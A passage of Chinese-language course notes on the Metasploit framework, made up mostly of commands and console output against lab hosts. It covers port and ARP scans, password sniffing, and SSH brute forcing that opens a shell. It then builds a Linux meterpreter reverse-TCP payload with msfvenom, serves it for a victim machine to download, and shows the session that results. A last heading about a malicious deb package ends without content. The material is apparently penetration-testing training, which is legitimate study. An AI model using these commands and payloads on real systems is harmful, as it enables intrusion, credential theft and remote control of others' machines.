文章目录
- Metasploit渗透测试框架
- 基于TCP协议收集主机信息
- 开放端口扫描db_nmap
- 查询网段内在线存活的主机
- 半连接的方式进行半连接扫描
- 使用auxiliary/sniffer下的psunffle模块进行密码嗅探
- 基于SNMP协议收集主机信息
- 基于SSH协议收集主机信息
- 实战-制作Linux恶意病毒获取公司服务权限
- 实战-利用deb包-0day-java环境进行渗透
Metasploit渗透测试框架
一下笔记为观看课程得出https://www.bilibili.com/video/BV127411c7yE?p=6&spm_id_from=pageDriver&vd_source=5294f3174c841de416fef55d145e1e28
基于TCP协议收集主机信息
开放端口扫描db_nmap
db_nmap -sV 192.168.211.211
查询网段内在线存活的主机
search arp
use 1
set RHoSTS 192.168.211.0/24
set threads 10
run
展示效果查询结果如下:
msf6 > search arp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/spoof/arp/arp_poisoning 1999-12-22 normal No ARP Spoof
1 auxiliary/scanner/discovery/arp_sweep normal No ARP Sweep Local Network Discovery
2 post/windows/gather/bloodhound normal No BloodHound Ingestor
3 exploit/unix/webapp/carberp_backdoor_exec 2013-06-28 great Yes Carberp Web Panel C2 Backdoor Remote PHP Code Execution
4 exploit/linux/http/dlink_dcs931l_upload 2015-02-23 great Yes D-Link DCS-931L File Upload
5 auxiliary/scanner/discovery/ipv6_neighbor normal No IPv6 Local Neighbor Discovery
6 exploit/windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
7 exploit/windows/smb/smb_shadow 2021-02-16 manual No Microsoft Windows SMB Direct Session Takeover
8 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
9 auxiliary/scanner/misc/raysharp_dvr_passwords normal No Ray Sharp DVR Password Retriever
10 post/windows/gather/arp_scanner normal No Windows Gather ARP Scanner
11 post/windows/gather/forensics/browser_history normal No Windows Gather Skype, Firefox, and Chrome Artifacts
Interact with a module by name or index. For example info 11, use 11 or use post/windows/gather/forensics/browser_history
msf6 > use 1
msf6 auxiliary(scanner/discovery/arp_sweep) > option
[-] Unknown command: option
msf6 auxiliary(scanner/discovery/arp_sweep) > options
Module options (auxiliary/scanner/discovery/arp_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 5 yes The number of seconds to wait for new data
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHoSTS 192.168.211.0/24
RHoSTS => 192.168.211.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
threads => 10
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.211.1 appears to be up (VMware, Inc.).
[+] 192.168.211.2 appears to be up (VMware, Inc.).
[+] 192.168.211.148 appears to be up (VMware, Inc.).
[+] 192.168.211.211 appears to be up (VMware, Inc.).
[+] 192.168.211.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
半连接的方式进行半连接扫描
msf6 > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
3 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
4 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
7 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 > use 6
msf6 auxiliary(scanner/portscan/syn) > options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY)
in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/usin
g-metasploit/basics/using-metasploit.html
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 500 yes The reply read timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/syn) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/portscan/syn) > set ports 80
ports => 80
msf6 auxiliary(scanner/portscan/syn) > set threads 15
threads => 15
msf6 auxiliary(scanner/portscan/syn) > run
[+] TCP OPEN 192.168.211.211:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
使用auxiliary/sniffer下的psunffle模块进行密码嗅探
嗅探也就是监听的意思
命令
msf6 > search psnuf
msf6 > use 0
msf6 auxiliary(sniffer/psnuffle) > info
msf6 auxiliary(sniffer/psnuffle) > run
运行界面
msf6 > search psnuf
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/sniffer/psnuffle normal No pSnuffle Packet Sniffer
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/sniffer/psnuffle
msf6 > use 0
msf6 auxiliary(sniffer/psnuffle) > info
Name: pSnuffle Packet Sniffer
Module: auxiliary/sniffer/psnuffle
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Max Moser <mmo@remote-exploit.org>
Available actions:
Name Description
---- -----------
List List protocols
=> Sniffer Run sniffer
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or
"all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 500 yes The number of seconds to wait for new data
Description:
This module sniffs passwords like dsniff did in the past
View the full module info with the info -d command.
msf6 auxiliary(sniffer/psnuffle) > options
Module options (auxiliary/sniffer/psnuffle):
Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or
"all".
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 500 yes The number of seconds to wait for new data
Auxiliary action:
Name Description
---- -----------
Sniffer Run sniffer
View the full module info with the info, or info -d command.
msf6 auxiliary(sniffer/psnuffle) > RUN
[-] Unknown command: RUN
msf6 auxiliary(sniffer/psnuffle) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(sniffer/psnuffle) >
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] HTTP GET: 192.168.211.152:53870-192.99.200.113:80 http://http.kali.org/kali/pool/main/l/lftp/lftp_4.9.2-2%2bb1_amd64.deb
[*] HTTP GET: 192.168.211.152:46494-104.18.102.100:80 http://kali.download/kali/pool/main/l/lftp/lftp_4.9.2-2+b1_amd64.deb
msf6 auxiliary(sniffer/psnuffle) > [!] *** auxiliary/sniffer/psnuffle is still calling the depted report_auth_info method! This needs to be updated!
[!] *** For detailed information about LoginScanners and the Credentials objects see:
[!] https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creatmetasploit-framework-loginscanners.html
[!] https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/how-tite-a-http-loginscanner-module.html
[!] *** For examples of modules converted to just report credentials without report_auth_info,:
[!] https://github.com/rapid7/metasploit-framework/pull/5376
[!] https://github.com/rapid7/metasploit-framework/pull/5377
[*] Successful FTP Login: 192.168.211.152:52010-192.168.211.211:21 >> msfadmin / msfadmin
[*] HTTP GET: 192.168.211.148:59742-185.125.190.17:80 http://connectivity-check.ubuntu.com/
基于SNMP协议收集主机信息
简单管理协议
msf6 > search snmp_enum
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/snmp/snmp_enum_hp_laserjet normal No HP LaserJet Printer SNMP Enumeration
1 auxiliary/scanner/snmp/snmp_enum normal No SNMP Enumeration Module
2 auxiliary/scanner/snmp/snmp_enumshares normal No SNMP Windows SMB Share Enumeration
3 auxiliary/scanner/snmp/snmp_enumusers normal No SNMP Windows Username Enumeration
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/snmp/snmp_enumusers
msf6 > use 1
msf6 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/snmp/snmp_enum) > run
基于SSH协议收集主机信息
攻击过程如下
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in
the current database
DB_ALL_PASS false no Add all passwords in the current databas
e to the list
DB_ALL_USERS false no Add all users in the current database to
the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the
current database (Accepted: none, user,
user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.met
asploit.com/docs/using-metasploit/basics
/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works fo
r a host
THREADS 1 yes The number of concurrent threads (max on
e per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords sepa
rated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all
users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /root/root_userpass.txt
userpass_file => /root/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to
5
DB_ALL_CREDS false no Try each user/password couple stor
ed in the current database
DB_ALL_PASS false no Add all passwords in the current d
atabase to the list
DB_ALL_USERS false no Add all users in the current datab
ase to the list
DB_SKIP_EXISTING none no Skip existing credentials stored i
n the current database (Accepted:
none, user, user&realm)
PASSWORD no A specific password to authenticat
e with
PASS_FILE no File containing passwords, one per
line
RHOSTS 192.168.211.211 yes The target host(s), see https://do
cs.metasploit.com/docs/using-metas
ploit/basics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential wo
rks for a host
THREADS 1 yes The number of concurrent threads (
max one per host)
USERNAME no A specific username to authenticat
e as
USERPASS_FILE /root/root_userpass.t no File containing users and password
xt s separated by space, one pair per
line
USER_AS_PASS false no Try the username as the password f
or all users
USER_FILE no File containing usernames, one per
line
VERBOSE false yes Whether to print output for all at
tempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.211.211:22 - Starting bruteforce
[-] 192.168.211.211:22 - Failed: 'root:'
[-] 192.168.211.211:22 - Failed: 'root:!root'
[-] 192.168.211.211:22 - Failed: 'root:Cisco'
[-] 192.168.211.211:22 - Failed: 'root:NeXT'
[-] 192.168.211.211:22 - Failed: 'root:QNX'
[-] 192.168.211.211:22 - Failed: 'root:admin'
[-] 192.168.211.211:22 - Failed: 'root:attack'
[-] 192.168.211.211:22 - Failed: 'root:ax400'
[-] 192.168.211.211:22 - Failed: 'root:bagabu'
[-] 192.168.211.211:22 - Failed: 'root:blablabla'
[-] 192.168.211.211:22 - Failed: 'root:blender'
[-] 192.168.211.211:22 - Failed: 'root:brightmail'
[-] 192.168.211.211:22 - Failed: 'root:calvin'
[-] 192.168.211.211:22 - Failed: 'root:changeme'
[-] 192.168.211.211:22 - Failed: 'root:changethis'
[-] 192.168.211.211:22 - Failed: 'root:default'
[-] 192.168.211.211:22 - Failed: 'root:fibranne'
[-] 192.168.211.211:22 - Failed: 'root:honey'
[-] 192.168.211.211:22 - Failed: 'root:jstwo'
[-] 192.168.211.211:22 - Failed: 'root:kn1TG7psLu'
[-] 192.168.211.211:22 - Failed: 'root:letacla'
[-] 192.168.211.211:22 - Failed: 'root:mpegvideo'
[-] 192.168.211.211:22 - Failed: 'root:nsi'
[-] 192.168.211.211:22 - Failed: 'root:par0t'
[-] 192.168.211.211:22 - Failed: 'root:pass'
[-] 192.168.211.211:22 - Failed: 'root:password'
[-] 192.168.211.211:22 - Failed: 'root:pixmet2003'
[-] 192.168.211.211:22 - Failed: 'root:resumix'
[-] 192.168.211.211:22 - Failed: 'root:root'
[-] 192.168.211.211:22 - Failed: 'root:rootme'
[-] 192.168.211.211:22 - Failed: 'root:rootpass'
[-] 192.168.211.211:22 - Failed: 'root:t00lk1t'
[-] 192.168.211.211:22 - Failed: 'root:tini'
[-] 192.168.211.211:22 - Failed: 'root:toor'
[-] 192.168.211.211:22 - Failed: 'root:trendimsa1.0'
[-] 192.168.211.211:22 - Failed: 'root:tslinux'
[-] 192.168.211.211:22 - Failed: 'root:uClinux'
[-] 192.168.211.211:22 - Failed: 'root:vertex25'
[-] 192.168.211.211:22 - Failed: 'root:owaspbwa'
[-] 192.168.211.211:22 - Failed: 'root:permit'
[-] 192.168.211.211:22 - Failed: 'root:ascend'
[-] 192.168.211.211:22 - Failed: 'root:ROOT500'
[-] 192.168.211.211:22 - Failed: 'root:cms500'
[-] 192.168.211.211:22 - Failed: 'root:fivranne'
[-] 192.168.211.211:22 - Failed: 'root:davox'
[-] 192.168.211.211:22 - Failed: 'root:letmein'
[-] 192.168.211.211:22 - Failed: 'root:powerapp'
[-] 192.168.211.211:22 - Failed: 'root:dbps'
[-] 192.168.211.211:22 - Failed: 'root:ibm'
[-] 192.168.211.211:22 - Failed: 'root:monitor'
[-] 192.168.211.211:22 - Failed: 'root:turnkey'
[-] 192.168.211.211:22 - Failed: 'root:vagrant'
[+] 192.168.211.211:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 1 opened (192.168.211.152:42941 -> 192.168.211.211:22) at 2023-06-14 04:03:51 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.211.152:42941 -> 192.168.211.211:22 (192.1
68.211.211)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
pwd
/home/msfadmin
实战-制作Linux恶意病毒获取公司服务权限
制作Linux恶意病毒
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.211.152 LPORT=4444 -b"\x00" -i 10 -f elf -o /var/www/html/xuegod
开启阿帕奇服务,让肉机进行下载
/etc/init.d/apache2 start
攻击机设置好payload
use exploit/multi/handler
set lHOST 192.268.211.152
set payload linux/x64/meterpreter/reverse_tcp
让肉机进行下载之后运行
攻击机即可获取到权限
[*] Started reverse TCP handler on 192.168.211.152:4444
[*] Sending stage (3045348 bytes) to 192.168.211.128
[*] Meterpreter session 1 opened (192.168.211.152:4444 -> 192.168.211.128:34184) at 2023-06-14 21:44:49 -0400
meterpreter >
meterpreter >
meterpreter >
meterpreter > ls
Listing: /home/testcai
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 314 fil 2023-06-14 21:30:30 -0400 .ICEauthority
100644/rw-r--r-- 18 fil 2018-04-10 20:53:01 -0400 .bash_logout
100644/rw-r--r-- 193 fil 2018-04-10 20:53:01 -0400 .bash_profile
100644/rw-r--r-- 231 fil 2018-04-10 20:53:01 -0400 .bashrc
040700/rwx------ 4096 dir 2023-06-14 21:31:13 -0400 .cache
040755/rwxr-xr-x 261 dir 2023-06-14 21:31:15 -0400 .config
040700/rwx------ 25 dir 2023-06-14 21:30:29 -0400 .dbus
100600/rw------- 16 fil 2023-06-14 21:30:31 -0400 .esd_auth
040700/rwx------ 19 dir 2023-06-14 21:30:30 -0400 .local
040755/rwxr-xr-x 54 dir 2023-06-14 21:31:13 -0400 .mozilla
100775/rwxrwxr-x 655 fil 2023-06-14 21:35:00 -0400 xuegod
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 下载
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 公共
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 图片
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 文档
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 桌面
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 模板
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 视频
040755/rwxr-xr-x 6 dir 2023-06-14 21:30:34 -0400 音乐
实战-利用deb包-0day-java环境进行渗透
制作恶意软件包使用–download-only方式进行下载软件包不进行安装
